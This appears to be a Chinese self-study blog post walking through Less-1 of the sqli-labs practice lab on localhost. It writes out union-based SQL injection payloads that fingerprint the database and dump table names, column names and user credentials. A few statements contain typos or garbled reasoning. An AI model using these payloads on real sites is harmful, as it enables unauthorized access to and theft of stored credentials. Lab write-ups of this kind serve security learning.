【网安自学/web漏洞-day01】sqli-labs第一关

Less-1 **Error Based- String**

  1. 原sql为 select * from users where id=1; 判断是否为字符型注入 select * form users where id='1’'
  2. 若界面改变则为字符型注入,猜列名的数量:select * from users where id='1'' order by 5--+

(可以使用二分法进行) ;若为5的时候界面错误,4的时候界面不会报错了说明有三列

  1. 猜显示的位置:
    1.  
      select * from users where id='-1'' union select 1,2,3--+

    2.  (http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3--+)
    3. 显示的数字即是对应的位置。

  2. 信息收集:
    1. 数据库版本:version()
    2. 数据库名称:database()
    3. 数据库用户:user()
    4. 操作系统:@@verson_compile_os
  3. 根据显示的位置查询数据库下的表名、操作系统信息
    1. select * from users where id=-1' union select 1,version(),database()--+ http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,version(),database()--+
    2. 查询到现在使用的数据库为”security”
    3.     

  4. 查询一个指定的数据库名下的表名信息(根据显示位):
    1. http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(table_name),null from information_schema.tables where table_schema='security'--+
    2. 查询到security数据库下有四个表,其中users可能是我们想要的敏感信息

  5. 查询users表。
    1. http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
    2. 查询到users表下有:id,username,password,level字段

  6. 查询users下的username、password字段
    1. http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(username),3 from security.users--+

  7. 同理搜索password

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值